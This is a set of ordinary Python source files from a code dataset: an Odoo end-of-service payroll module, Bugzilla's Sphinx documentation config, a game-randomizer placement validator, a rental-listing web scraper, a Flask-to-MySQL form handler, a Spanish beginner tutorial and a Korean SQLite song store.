@api.onchange('reason')\n # def create_FinancialDues(self):\n # for rec in self:\n # if rec.reason:\n # res = self.env['reasons.end_of.service'].search([('reason', '=', rec.reason)],limit=1)\n # if res:\n # for reason in res:\n # if reason.pay_for_working_days:\n # rec.pay_for_working_days_boolean = True\n # else:\n # rec.pay_for_working_days_boolean = False\n #\n # if reason.month_of_warning:\n # rec.month_of_warning_boolean = True\n # else:\n # rec.month_of_warning_boolean = False\n #\n # if reason.leave_entitlement:\n # rec.leave_entitlement_boolean = True\n # else:\n # rec.leave_entitlement_boolean = False\n #\n # if reason.leave_transportation_allowance:\n # rec.leave_transportation_allowance_boolean = True\n # else:\n # rec.leave_transportation_allowance_boolean = False\n #\n # if reason.end_of_service_gratuity:\n # rec.end_of_service_gratuity_boolean = True\n # else:\n # rec.end_of_service_gratuity_boolean = False\n #\n # if reason.extra_pay:\n # rec.extra_pay_boolean = True\n # else:\n # rec.extra_pay_boolean = False\n #\n # if reason.grants_and_incentives:\n # rec.grants_and_incentives_boolean = True\n # else:\n # rec.grants_and_incentives_boolean = False\n #\n # if reason.other:\n # rec.other_boolean = True\n # else:\n # rec.other_boolean = False\n #\n # if reason.compensation:\n # rec.compensation_boolean = True\n # else:\n # rec.compensation_boolean = False\n\n def action_compute(self):\n for rec in self:\n\n years = relativedelta(rec.end_of_service_date, rec.date_of_hiring_date).years\n if rec.employee_id:\n total_benefits = 0.0\n res_payslip = self.env['hr.payslip'].search([\n ('employee_id', '=', rec.employee_id.id),\n ('state', 'not in', ['done', 'paid']),\n ], order='date_to desc', limit=1)\n print('----------res_payslip', res_payslip)\n if res_payslip:\n rec.pay_for_working_days = res_payslip.net_wage\n rec.compensation = rec.basic_salary * 6\n res_config = self.env['indemnity.config'].search([], order='date desc',\n limit=1)\n for line in res_config.indemnity_config_ids:\n if years >= line.from_year and years <= line.to_year:\n if line.month_count == '1':\n rec.end_of_service_gratuity = 1 * rec.basic_salary * years\n if line.month_count == '2':\n rec.end_of_service_gratuity = 1.5 * rec.basic_salary * years\n\n if line.month_count == '3':\n rec.end_of_service_gratuity = 2 * rec.basic_salary * years\n\n if line.month_count == '4':\n rec.end_of_service_gratuity = 2.5 * rec.basic_salary * years\n\n if line.month_count == '5':\n rec.end_of_service_gratuity = 3 * rec.basic_salary * years\n\n rec.leave_transportation_allowance = (rec.comprehensive_wage / 30) * rec.employee_id.remaining_leaves\n total_benefits = rec.pay_for_working_days + rec.month_of_warning + rec.leave_entitlement + rec.leave_transportation_allowance + rec.end_of_service_gratuity + rec.extra_pay + rec.grants_and_incentives + rec.other + rec.compensation\n rec.total_benefits = total_benefits\n\n # print('------------res', res_config)\n\n\nclass FinancialDues(models.Model):\n _name = 'financial.dues'\n\n name = fields.Char(string=\"Name\", required=False, )\n amount = fields.Float(string=\"Amount\", required=False, )\n note = fields.Text(string=\"Note\", required=False, )\n\n end_of_service_id = fields.Many2one(comodel_name=\"end_of.service\", string=\"\", required=False, )\n","repo_name":"nusyba111/tad","sub_path":"hr_end_of_service_srcs/models/end_of_service.py","file_name":"end_of_service.py","file_ext":"py","file_size_in_byte":14601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"11365331266","text":"# -*- coding: utf-8 -*-\n#\n# Bugzilla documentation build configuration file, created by\n# sphinx-quickstart on Tue Sep 3 16:11:00 2013.\n#\n# This file is execfile()d with the current directory set to its containing dir.\n#\n# Note that not all possible configuration values are present in this\n# autogenerated file.\n#\n# All configuration values have a default; values that are commented out\n# serve to show the default.\n\nimport sys, os, re\n\n# If extensions (or modules to document with autodoc) are in another directory,\n# add these directories to sys.path here. If the directory is relative to the\n# documentation root, use os.path.abspath to make it absolute, like shown here.\n#sys.path.insert(0, os.path.abspath('.'))\n\n# -- General configuration -----------------------------------------------------\n\n# If your documentation needs a minimal Sphinx version, state it here.\nneeds_sphinx = '1.0'\n\n# Add any Sphinx extension module names here, as strings. They can be extensions\n# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.\nextensions = ['sphinx.ext.todo', 'sphinx.ext.extlinks']\n\nif tags.has('enable_rst2pdf'):\n extensions.append('rst2pdf.pdfbuilder')\n\n# Add any paths that contain templates here, relative to this directory.\ntemplates_path = ['_templates']\n\n# The suffix of source filenames.\nsource_suffix = '.rst'\n\n# The encoding of source files.\n#source_encoding = 'utf-8-sig'\n\n# The master toctree document.\nmaster_doc = 'index'\n\n# General information about the project.\nproject = u'Bugzilla'\ncopyright = u'2016, The Bugzilla Team'\n\n# The version info for the project you're documenting, acts as replacement for\n# |version| and |release|, also used in various other places throughout the\n# built documents.\n#\n# The short X.Y version.\nversion = 'Unknown'\n# The full version, including alpha/beta/rc tags.\nrelease = 'Unknown'\n\nfor line in open(\"../../../Bugzilla/Constants.pm\"):\n match = re.search(r'BUGZILLA_VERSION\\s+=>\\s+\"([^\"]+)\"', line)\n if (match):\n release = match.group(1)\n match = re.search(r'^\\d+\\.\\d+', release)\n if (match):\n version = match.group(0)\n else:\n version = release\n break\n\n# The language for content autogenerated by Sphinx. Refer to documentation\n# for a list of supported languages.\n#language = None\n\n# There are two options for replacing |today|: either, you set today to some\n# non-false value, then it is used:\n#today = ''\n# Else, today_fmt is used as the format for a strftime call.\n#today_fmt = '%B %d, %Y'\n\n# List of patterns, relative to source directory, that match files and\n# directories to ignore when looking for source files.\nexclude_patterns = ['**.inc.rst']\n\n# The reST default role (used for this markup: `text`) to use for all documents.\n#default_role = None\n\n# If true, '()' will be appended to :func: etc. cross-reference text.\n#add_function_parentheses = True\n\n# If true, the current module name will be prepended to all description\n# unit titles (such as .. function::).\n#add_module_names = True\n\n# If true, sectionauthor and moduleauthor directives will be shown in the\n# output. They are ignored by default.\n#show_authors = False\n\n# The name of the Pygments (syntax highlighting) style to use.\npygments_style = 'sphinx'\n\n# A list of ignored prefixes for module index sorting.\n#modindex_common_prefix = []\n\nrst_prolog = \"\"\"\n.. role:: param\n :class: param\n\n.. role:: paramval\n :class: paramval\n\n.. role:: group\n :class: group\n\n.. role:: field\n :class: field\n\n.. |min-perl-ver| replace:: 5.10.1\n\"\"\"\n\nrst_epilog = \"\"\"\n\n----------\n\nThis documentation undoubtedly has bugs; if you find some, please file\nthem `here `_.\n\"\"\"\n\n# -- Options for HTML output ---------------------------------------------------\n\n# The theme to use for HTML and HTML Help pages. See the documentation for\n# a list of builtin themes.\nhtml_theme = 'default'\n\n# Theme options are theme-specific and customize the look and feel of a theme\n# further. For a list of options available for each theme, see the\n# documentation.\n#html_theme_options = {}\n\n# Add any paths that contain custom themes here, relative to this directory.\n#html_theme_path = []\n\n# The name for this set of Sphinx documents. If None, it defaults to\n# \" v documentation\".\n#html_title = None\n\n# A shorter title for the navigation bar. Default is the same as html_title.\n#html_short_title = None\n\nhtml_style = \"bugzilla.css\"\n\n# The name of an image file (relative to this directory) to place at the top\n# of the sidebar.\nhtml_logo = \"../images/bugzilla.png\"\n\n# The name of an image file (within the static path) to use as favicon of the\n# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32\n# pixels large.\nhtml_favicon = '../../../images/favicon.ico'\n\n# Add any paths that contain custom static files (such as style sheets) here,\n# relative to this directory. They are copied after the builtin static files,\n# so a file named \"default.css\" will overwrite the builtin \"default.css\".\nhtml_static_path = ['_static']\n\n# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,\n# using the given strftime format.\n#html_last_updated_fmt = '%b %d, %Y'\n\n# If true, SmartyPants will be used to convert quotes and dashes to\n# typographically correct entities.\n# Switched off because it converted --long-option to –long-option\nhtml_use_smartypants = False\n\n# Custom sidebar templates, maps document names to template names.\n#html_sidebars = {}\n\n# Additional templates that should be rendered to pages, maps page names to\n# template names.\n#html_additional_pages = {}\n\n# If false, no module index is generated.\n#html_domain_indices = True\n\n# If false, no index is generated.\nhtml_use_index = False\n\n# If true, the index is split into individual pages for each letter.\n#html_split_index = False\n\n# If true, links to the reST sources are added to the pages.\nhtml_show_sourcelink = False\n\n# If true, \"Created using Sphinx\" is shown in the HTML footer. Default is True.\n#html_show_sphinx = True\n\n# If true, \"(C) Copyright ...\" is shown in the HTML footer. Default is True.\nhtml_show_copyright = False\n\n# If true, an OpenSearch description file will be output, and all pages will\n# contain a tag referring to it. The value of this option must be the\n# base URL from which the finished HTML is served.\n#html_use_opensearch = ''\n\n# This is the file name suffix for HTML files (e.g. \".xhtml\").\n#html_file_suffix = None\n\n# Output file base name for HTML help builder.\nhtmlhelp_basename = 'Bugzilladoc'\n\n# -- Options for LaTeX output --------------------------------------------------\n\nlatex_elements = {\n# The paper size ('letterpaper' or 'a4paper').\n#'papersize': 'letterpaper',\n\n# The font size ('10pt', '11pt' or '12pt').\n#'pointsize': '10pt',\n\n# Additional stuff for the LaTeX preamble.\n#'preamble': '',\n}\n\n# Grouping the document tree into LaTeX files. List of tuples\n# (source start file, target name, title, author, documentclass [howto/manual]).\nlatex_documents = [\n ('index', 'Bugzilla.tex', u'Bugzilla Documentation',\n u'The Bugzilla Team', 'manual'),\n]\n\n# The name of an image file (relative to this directory) to place at the top of\n# the title page.\n#latex_logo = None\n\n# For \"manual\" documents, if this is true, then toplevel headings are parts,\n# not chapters.\n#latex_use_parts = False\n\n# If true, show page references after internal links.\n#latex_show_pagerefs = False\n\n# If true, show URL addresses after external links.\n#latex_show_urls = False\n\n# Documents to append as an appendix to all manuals.\n#latex_appendices = []\n\n# If false, no module index is generated.\n#latex_domain_indices = True\n\n\n# -- Options for manual page output --------------------------------------------\n\n# One entry per manual page. List of tuples\n# (source start file, name, description, authors, manual section).\nman_pages = [\n ('index', 'bugzilla', u'Bugzilla Documentation',\n [u'The Bugzilla Team'], 1)\n]\n\n# If true, show URL addresses after external links.\n#man_show_urls = False\n\n\n# -- Options for Texinfo output ------------------------------------------------\n\n# Grouping the document tree into Texinfo files. List of tuples\n# (source start file, target name, title, author,\n# dir menu entry, description, category)\ntexinfo_documents = [\n ('index', 'Bugzilla', u'Bugzilla Documentation',\n u'The Bugzilla Team', 'Bugzilla', 'One line description of project.',\n 'Miscellaneous'),\n]\n\n# Documents to append as an appendix to all manuals.\n#texinfo_appendices = []\n\n# If false, no module index is generated.\n#texinfo_domain_indices = True\n\n# How to display URL addresses: 'footnote', 'no', or 'inline'.\n#texinfo_show_urls = 'footnote'\n\n# -- Options for PDF output --------------------------------------------------\n\n# Grouping the document tree into PDF files. List of tuples\n# (source start file, target name, title, author, options).\n#\n# If there is more than one author, separate them with \\\\.\n# For example: r'Guido van Rossum\\\\Fred L. Drake, Jr., editor'\n#\n# The options element is a dictionary that lets you override\n# this config per-document.\n# For example,\n# ('index', u'MyProject', u'My Project', u'Author Name',\n# dict(pdf_compressed = True))\n# would mean that specific document would be compressed\n# regardless of the global pdf_compressed setting.\n\npdf_documents = [\n('index', u'Bugzilla', u'Bugzilla Documentation', u'The Bugzilla Team'),\n]\n\n# A comma-separated list of custom stylesheets. Example:\npdf_stylesheets = ['sphinx','kerning','a4']\n\n# A list of folders to search for stylesheets. Example:\npdf_style_path = ['.', '_styles']\n\n# Create a compressed PDF\n# Use True/False or 1/0\n# Example: compressed=True\npdf_compressed = True\n\n# A colon-separated list of folders to search for fonts. Example:\n# pdf_font_path = ['/usr/share/fonts', '/usr/share/texmf-dist/fonts/']\n\n# Language to be used for hyphenation support\n#pdf_language = \"en_US\"\n\n# Mode for literal blocks wider than the frame. Can be\n# overflow, shrink or truncate\npdf_fit_mode = \"shrink\"\n\n# Section level that forces a break page.\n# For example: 1 means top-level sections start in a new page\n# 0 means disabled\npdf_break_level = 2\n\n# When a section starts in a new page, force it to be 'even', 'odd',\n# or just use 'any'\n#pdf_breakside = 'any'\n\n# Insert footnotes where they are defined instead of\n# at the end.\n#pdf_inline_footnotes = True\n\n# verbosity level. 0 1 or 2\npdf_verbosity = 0\n\n# If false, no index is generated.\npdf_use_index = False\n\n# If false, no modindex is generated.\npdf_use_modindex = False\n\n# If false, no coverpage is generated.\n#pdf_use_coverpage = True\n\n# Name of the cover page template to use\n#pdf_cover_template = 'sphinxcover.tmpl'\n\n# Documents to append as an appendix to all manuals.\n#pdf_appendices = []\n\n# Enable experimental feature to split table cells. Use it\n# if you get \"DelayedTable too big\" errors\n#pdf_splittables = False\n\n# Set the default DPI for images\n#pdf_default_dpi = 72\n\n# Enable rst2pdf extension modules (default is only vectorpdf)\n# you need vectorpdf if you want to use sphinx's graphviz support\npdf_extensions = ['vectorpdf', 'dotted_toc']\n\n# Page template name for \"regular\" pages\n#pdf_page_template = 'cutePage'\n\n# Show Table Of Contents at the beginning?\npdf_use_toc = True\n\n# How many levels deep should the table of contents be?\npdf_toc_depth = 5\n\n# Add section number to section references\npdf_use_numbered_links = True\n\n# Background images fitting mode\npdf_fit_background_mode = 'scale'\n\n# -- Options for Sphinx extensions -------------------------------------------\n\n# Temporary highlighting of TODO items\ntodo_include_todos = False\n\n# The readthedocs.org website cannot access POD.\non_rtd = os.environ.get('READTHEDOCS', None) == 'True'\n\nif on_rtd:\n base_api_url = 'https://www.bugzilla.org/docs/5.0/en/html/integrating/api/'\nelse:\n base_api_url = '../integrating/api/'\n\nextlinks = {'bug': ('https://bugzilla.mozilla.org/show_bug.cgi?id=%s', 'bug '),\n 'api': (base_api_url + '%s', '')}\n","repo_name":"WebKit/WebKit","sub_path":"Websites/bugs.webkit.org/docs/en/rst/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":12073,"program_lang":"python","lang":"en","doc_type":"code","stars":6880,"dataset":"github-code","pt":"3"}
+{"seq_id":"36807292167","text":"from .constants import *\nfrom options import Options\nfrom version import VERSION\n\nimport json\n\n\nclass InvalidPlacementFile(Exception):\n pass\n\n\nclass PlacementFile:\n def __init__(self):\n self.version = \"\"\n self.options = Options()\n self.hash_str = \"\"\n self.starting_items = []\n self.required_dungeons = []\n self.item_locations = {}\n self.chest_dowsing = {}\n self.hints = {}\n self.dungeon_connections = {}\n self.trial_connections = {}\n self.trial_object_seed = -1\n self.music_rando_seed = -1\n self.bk_angle_seed = -1\n\n def read_from_file(self, f):\n self._read_from_json(json.load(f))\n\n def read_from_str(self, s):\n self._read_from_json(json.loads(s))\n\n def to_json_str(self):\n retval = {\n \"version\": self.version,\n \"permalink\": self.options.get_permalink(exclude_seed=True),\n \"hash\": self.hash_str,\n \"starting-items\": self.starting_items,\n \"required-dungeons\": self.required_dungeons,\n \"item-locations\": self.item_locations,\n \"chest-dowsing\": self.chest_dowsing,\n \"hints\": self.hints,\n \"entrance-connections\": self.dungeon_connections,\n \"trial-connections\": self.trial_connections,\n \"trial-object-seed\": self.trial_object_seed,\n \"music-rando-seed\": self.music_rando_seed,\n \"bk-angle-seed\": self.bk_angle_seed,\n }\n return json.dumps(retval, indent=2)\n\n def _read_from_json(self, jsn):\n self.version = jsn[\"version\"]\n self.options.update_from_permalink(jsn[\"permalink\"])\n self.options.set_option(\"seed\", -1)\n self.hash_str = jsn[\"hash\"]\n self.starting_items = jsn[\"starting-items\"]\n self.required_dungeons = jsn[\"required-dungeons\"]\n self.item_locations = jsn[\"item-locations\"]\n self.chest_dowsing = jsn[\"chest-dowsing\"]\n self.hints = jsn[\"hints\"]\n self.dungeon_connections = jsn[\"entrance-connections\"]\n self.trial_connections = jsn[\"trial-connections\"]\n self.trial_object_seed = jsn[\"trial-object-seed\"]\n self.music_rando_seed = jsn[\"music-rando-seed\"]\n self.bk_angle_seed = jsn[\"bk-angle-seed\"]\n\n def check_valid(self, areas):\n \"\"\"checks, if the current state is valid, throws an exception otherwise\n This does not check consistency with all the settings\"\"\"\n if VERSION != self.version:\n raise InvalidPlacementFile(\n f\"Version did not match, requires {self.version} but found {VERSION}.\"\n )\n\n for item in self.starting_items:\n if item not in ALLOWED_STARTING_ITEMS:\n raise InvalidPlacementFile(f\"Invalid starting item {item}.\")\n\n for req_dungeon in self.required_dungeons:\n if req_dungeon not in REGULAR_DUNGEONS:\n raise InvalidPlacementFile(\n f\"{req_dungeon} is not a valid required dungeon.\"\n )\n\n if sorted(self.dungeon_connections.keys()) != sorted(\n DUNGEON_OVERWORLD_ENTRANCES.values()\n ):\n raise InvalidPlacementFile(\"Dungeon dungeon_connections are wrong.\")\n\n if sorted(self.dungeon_connections.values()) != sorted(\n DUNGEON_OVERWORLD_ENTRANCES.keys()\n ):\n raise InvalidPlacementFile(\"Dungeon entries are wrong.\")\n\n if sorted(self.trial_connections.keys()) != sorted(SILENT_REALM_GATES.values()):\n raise InvalidPlacementFile(\"Trial trial_connections are wrong.\")\n\n if sorted(self.trial_connections.values()) != sorted(SILENT_REALM_GATES.keys()):\n raise InvalidPlacementFile(\"Trial entries are wrong.\")\n\n for item in self.item_locations.values():\n if item not in ALL_ITEM_NAMES:\n raise InvalidPlacementFile(f'Invalid item \"{item}\".')\n\n check_sets_equal(\n set(areas.checks.keys()),\n set(self.item_locations.keys()),\n \"Checks\",\n )\n\n check_sets_equal(\n {FI_HINTS_KEY} | set(areas.gossip_stones.keys()) | set(SONG_HINTS),\n set(self.hints.keys()),\n \"Gossip Stone Hints\",\n )\n\n for hintlist in self.hints.values():\n if not isinstance(hintlist, list):\n raise InvalidPlacementFile(\n \"Gossip stone hints need to be LISTS of strings.\"\n )\n for hint in hintlist:\n if not isinstance(hint, str):\n raise InvalidPlacementFile(\n \"Gossip stone hints need to be lists of STRINGS.\"\n )\n\n\ndef check_sets_equal(orig: set, actual: set, name: str):\n if orig != actual:\n additional = actual - orig\n missing = orig - actual\n error_msg = \"\"\n if additional:\n error_msg += f\"Additional {name}:\\n\"\n error_msg += \", \".join(additional) + \"\\n\"\n if missing:\n error_msg += f\"Missing {name}:\\n\"\n error_msg += \", \".join(missing) + \"\\n\"\n raise InvalidPlacementFile(error_msg)\n","repo_name":"ssrando/ssrando","sub_path":"logic/placement_file.py","file_name":"placement_file.py","file_ext":"py","file_size_in_byte":5165,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"3"}
+{"seq_id":"34760051522","text":"import numpy as np\nimport pandas as pd\nimport requests\nfrom bs4 import BeautifulSoup\nimport re\n\nbaseurl = 'https://www.smartshanghai.com/housing/apartments-rent'\nhouse_data = pd.read_csv(\"housing_data_full.csv\",low_memory=False)\n\ndef get_data(a,b):\n contents = []\n for page in range(a,b):\n\n params = {'page': page}\n response = requests.get(baseurl,params)\n if response.status_code == 200:\n soup = BeautifulSoup(response.content, \"html.parser\")\n contents.append(soup.find_all(\"div\", class_ = 'cont'))\n\n else:\n print(response.status_code)\n return contents\n\ndef extract_data(contents):\n\n Listing_Id = []\n District = []\n Price = []\n Size = []\n N_Bedrooms = []\n N_Bathrooms = []\n\n for content in contents:\n for i in range(len(content)):\n Listing_Id.append(content[i].find('div').attrs['data-listingid'])\n\n apts = content[i].find('div', class_ = 'body')\n price = apts.find('div', class_ = 'price').text.strip().split()[1].split(',')\n Price.append(price[0]+price[1])\n\n info = re.findall('\\d+', apts.find('div', class_ = 'room-type').text.strip())\n Size.append(info[0])\n N_Bedrooms.append(info[1])\n N_Bathrooms.append(info[2])\n\n df = pd.DataFrame(np.column_stack([Listing_Id,Price,Size,N_Bedrooms,N_Bathrooms]),\n columns=['Listing_Id','Price','Size','N_Bedrooms', 'N_Bathrooms'])\n\n return df\n #return pd.concat((house_data, df), ignore_index=True)\n\n\ndef page_data(data):\n\n features = ['Type', 'Available From', 'Agency Commission', 'Rooms', 'Size',\n 'Floor', 'Furnished', 'Main Window Facing', 'District', 'Area',\n 'Compound', 'Metro Station', 'Longtitue', 'Latitude', 'posting agent', 'description', 'first_post', 'Refresh']\n\n\n for list_id in data.Listing_Id:\n response = requests.get(f'{baseurl}/{list_id}')\n if response.status_code == 200:\n soup_info = BeautifulSoup(response.content, \"html.parser\")\n\n\n #each list's information\n try:\n detail = soup_info.find_all('div', class_='details')[0].find_all(name='div')\n except IndexError:\n print(list_id)\n\n #from 'Type' to 'Area'\n for indx, j in enumerate(detail[0:-3]):\n house_data.loc[list_id,features[indx]] = j.text.strip()\n\n #'Compound'\n house_data.loc[list_id,\"Compound\"] = detail[-3].text.split('/')[0].strip()\n\n # metro station\n text = detail[-2].text\n try:\n found = re.search('walk to(.+?)on line', text).group(1)\n except AttributeError:\n found = ''\n house_data.loc[list_id,\"Metro\"] = found.strip()\n\n #long & lat\n long = soup_info.find('span', itemprop=\"longitude\").text\n lat = soup_info.find('span', itemprop=\"latitude\").text\n house_data.loc[list_id,\"Longtitude\"] = long\n house_data.loc[list_id,\"Latitude\"] = lat\n\n #posting agent\n house_data.loc[list_id,\"Agent\"] = soup_info.find('p', class_='username').text\n\n #description\n house_data.loc[list_id,\"Description\"] = soup_info.find('div', class_='description').text.strip()\n\n #post and views\n post = soup_info.find('div', class_='posted-and-views').text.strip().split(',')\n\n house_data.loc[list_id,\"First_post\"] = ' '.join(post[0].split(' ')[1:])\n house_data.loc[list_id,\"Refresh\"] = ' '.join(post[2].split(' ')[2:])\n\n #values.append(value) # all listings\n\n #amenities\n amenity_pos = soup_info.find('div', class_='amenities').find_all('li', class_='positive')\n amenity_neg = soup_info.find('div', class_='amenities').find_all('li', class_='negative')\n\n amenity_pos = [i.text.strip() for i in amenity_pos]\n amenity_neg = [i.text.strip() for i in amenity_neg]\n\n for indx, amenity in enumerate(amenity_pos):\n house_data.loc[list_id,amenity_pos[indx]] = 1\n\n for indx, amenity in enumerate(amenity_neg):\n house_data.loc[list_id, amenity_neg[indx]] = 0\n return house_data\n\ndef save_data():\n house_data = extract_data(get_data(0,25))\n house_data = house_data.drop_duplicates()\n to_page = house_data[house_data['Type'].isnull()]\n\n house_data[\"extra_index\"] = house_data.Listing_Id\n house_data.set_index(\"extra_index\", inplace=True)\n\n house_data = page_data(to_page)\n #house_data.to_csv(\"housing_data_full.csv\", index=False)\n print(f\"Done, current size of database is {house_data.shape}\")\n return house_data\n","repo_name":"JessicaChuh/shanghai_housing","sub_path":"data_scraping.py","file_name":"data_scraping.py","file_ext":"py","file_size_in_byte":4608,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"12478181578","text":"from flask import Flask, request, render_template\nimport mysql.connector\n\napp = Flask(__name__)\n\n@app.route('/')\ndef form():\n return render_template('form.html')\n\n@app.route('/submit', methods=['POST'])\ndef submit():\n # Retrieve the form data\n name = request.form['name']\n email = request.form['email']\n message = request.form['message']\n\n cnx = mysql.connector.connect(user='user', password='password',\n host='localhost', database='mydatabase')\n cursor = cnx.cursor()\n\n query = \"INSERT INTO messages (name, email, message) VALUES (%s, %s, %s)\"\n values = (name, email, message)\n cursor.execute(query, values)\n cnx.commit()\n\n cursor.close()\n cnx.close()\n\n # Return a success message\n return 'Form submitted successfully!'\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"ACYProjects/cloud_refs","sub_path":"appengine/to_mysql.py","file_name":"to_mysql.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"10123751007","text":"'''\nprint('Hola Mundo')\nvalor = int(input('ingrese un numero '))\nprint('la suma es', valor + 10)\n'''\n\n'''\nint()\nfloat()\nstr()\nbool()\ncomplex()\n'''\n\n# asdasds\n\n# tipos de datos\n# entero\nnumero1 = 45\nnumero2 = 50\nreales = 45.0\ncomplejo = 45 + 2j\ncadena = \"hola\"\nboolean = True\nnada = None\n\n# operadores aritmeticos + - * / // % **\n\"\"\"\nprint(2 ** 5)\nprint(5 / 2)\nprint(5 // 2)\nprint(5 % 2)\n\"\"\"\n# estructuras de control\n# condicionales\n\n# < > >= <= == !=\n# and or ^\nopcion = None\n\nif(opcion == 1):\n print('mayor que 45')\nelif(opcion == 2):\n print(\"es menor\")\nelif(opcion == 3):\n print(\"es menor\")\nelse:\n print('son igual')\n\n# colecciones lista diccionario conjunto ...\n\nlista_numeros = [99, True, 22.5, \"hola\", 45, 78]\n\n# print(lista_numeros[2])\n\n# Ciclos\nnumero = 10\n# mientras\nwhile(numero < 10):\n print('numero', numero)\n numero += 1\n# para\nfor numero in lista_numeros:\n print(numero)\n","repo_name":"belwalter/curso_python_2018","sub_path":"inicio.py","file_name":"inicio.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
+{"seq_id":"20237301040","text":"'''\\\n음악 저장소\n===========\n\n음악 정보를 저장한다. \n다음과 같은 특징을 갖는다.\n\n- SQLite를 이용한 저장\n- Song 객체를 저장한다.\n- 음악 제목으로 검색할 수 있다\n'''\n\nimport sqlite3\nfrom datetime import datetime\nfrom song import Song\n\n# DB 파일 이름\nDB_PATH = 'jukebox.db'\n\nclass Store(object):\n \"음악을 DB에 저장 관리한다.\"\n \n def __init__(self):\n \"\"\"DB연결\"\"\"\n self.db = sqlite3.connect(DB_PATH, check_same_thread = False)\n self._setup_db()\n\n def update_or_new(self, song):\n \"기존에 있던 노래면 갱신하고 아니면 새로 생성한다.\"\n print(song)\n if song.dbid:\n print('update')\n self.update(song)\n else:\n print('new')\n self.save(song)\n\n def save(self, song):\n \"새로 생성한다.\"\n \n cursor = self.db.cursor()\n sql = \"\"\"\\\ninsert into SONGS \n (uid, title, artist, url, img_url, played_count, created_at, description, duration)\n values (?, ?, ?, ?, ?, ?, ?, ?, ?)\n\"\"\"\n song.created_at = datetime.now()\n\n data = (song.uid, song.title, song.artist, song.url,\n song.img_url, song.played_count, song.created_at, song.description, song.duration)\n\n cursor.execute(sql, data)\n \n cursor.close()\n song.dbid = cursor.lastrowid\n self.db.commit()\n print('saved ' + song.uid)\n\n\n def remove_all(self):\n \"모든 노래 제거\"\n cursor = self.db.cursor()\n sql = \"\"\"\\\nDELETE FROM SONGS;\n\"\"\"\n cursor.execute(sql)\n cursor.close()\n self.db.commit()\n\n def update(self, song):\n \"기존 데이터를 갱신한다.\"\n\n cursor = self.db.cursor()\n sql = \"\"\"\\\nupdate SONGS \n set uid=?, title=?, artist=?, url=?, img_url=?, played_count=?, description=?, duration=?\n where id=?\n\"\"\"\n data = (song.uid, song.title, song.artist, song.url,\n song.img_url, song.played_count, song.description, song.duration, song.dbid)\n cursor.execute(sql, data)\n cursor.close()\n self.db.commit()\n\n def find_by_id(self, dbid):\n \"UID로 노래를 찾는다.\"\n cursor = self.db.cursor()\n sql = '''\\\nselect id, uid, title, artist, url, img_url, played_count, created_at, description, duration FROM SONGS where id = ?\n'''\n cursor.execute(sql, (dbid, ))\n data = cursor.fetchone()\n if data:\n song = Song()\n\n song.dbid = data[0]\n song.uid = data[1]\n song.title = data[2]\n song.artist = data[3]\n song.url = data[4]\n song.img_url = data[5]\n song.played_count = data[6]\n song.created_at = data[7]\n song.description = data[8]\n song.duration = data[9]\n \n return song\n\n def find_by_uid(self, uid):\n \"UID로 노래를 찾는다.\"\n cursor = self.db.cursor()\n sql = '''\\\nselect id, uid, title, artist, url, img_url, played_count, created_at, description, duration FROM SONGS where uid = ?\n'''\n cursor.execute(sql, (uid, ))\n data = cursor.fetchone()\n if data:\n song = Song()\n\n song.dbid = data[0]\n song.uid = data[1]\n song.title = data[2]\n song.artist = data[3]\n song.url = data[4]\n song.img_url = data[5]\n song.played_count = data[6]\n song.created_at = data[7]\n song.description = data[8]\n song.duration = data[9] \n \n return song\n \n def find_songs_by_title(self, title):\n \"노래 제목으로 곡을 찾는다.\"\n\n cursor = self.db.cursor()\n sql = '''\\\nselect id, uid, title, artist, url, img_url, played_count, created_at, description, duration FROM SONGS where title like ?\n'''\n cursor.execute(sql, (title, ))\n ret = []\n\n for data in cursor.fetchmany(5):\n if data:\n song = Song()\n\n song.dbid = data[0]\n song.uid = data[1]\n song.title = data[2]\n song.artist = data[3]\n song.url = data[4]\n song.img_url = data[5]\n song.played_count = data[6]\n song.created_at = data[7]\n song.description = data[8]\n song.duration = data[9]\n\n ret.append(song)\n \n return ret\n\n\n def get_songs(self):\n cursor = self.db.cursor()\n sql = '''\\\nselect id, uid, title, artist, url, img_url, played_count, created_at, description, duration FROM SONGS\n'''\n cursor.execute(sql)\n ret = []\n\n while True:\n data = cursor.fetchone()\n if data:\n song = Song()\n\n song.dbid = data[0]\n song.uid = data[1]\n song.title = data[2]\n song.artist = data[3]\n song.url = data[4]\n song.img_url = data[5]\n song.played_count = data[6]\n song.created_at = data[7]\n song.description = data[8]\n song.duration = data[9]\n \n yield song\n else:\n break\n\n \n \n def _setup_db(self):\n self._setup_song_table()\n\n def _setup_song_table(self):\n sql = '''\ncreate table if not exists SONGS (\n id integer primary key autoincrement,\n uid text unique,\n title text,\n artist text,\n url text,\n img_url text,\n played_count integer,\n created_at datetime,\n description text,\n duration integer\n);'''\n cursor = self.db.cursor()\n cursor.execute(sql)\n cursor.close()\n self.db.commit() \n\n\ndef test():\n from song import Song\n store = Store()\n\n song = Song()\n song.title = \"노래 제목\"\n song.uid = 'uid01'\n song.url = \"http://song_url\"\n song.played_count = 1\n store.save(song)\n\n s = store.findByUid('uid01')\n print(s)\n\n for s in store.findSongsByTitle('%노래%'):\n print(s)\n\ndef test_get_songs():\n store = Store()\n for song in store.get_songs():\n print(song)\n \n\nif __name__ == '__main__':\n test_get_songs()\n \n","repo_name":"jinniahn/book_python_example","sub_path":"ch13/store.py","file_name":"store.py","file_ext":"py","file_size_in_byte":6411,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"}
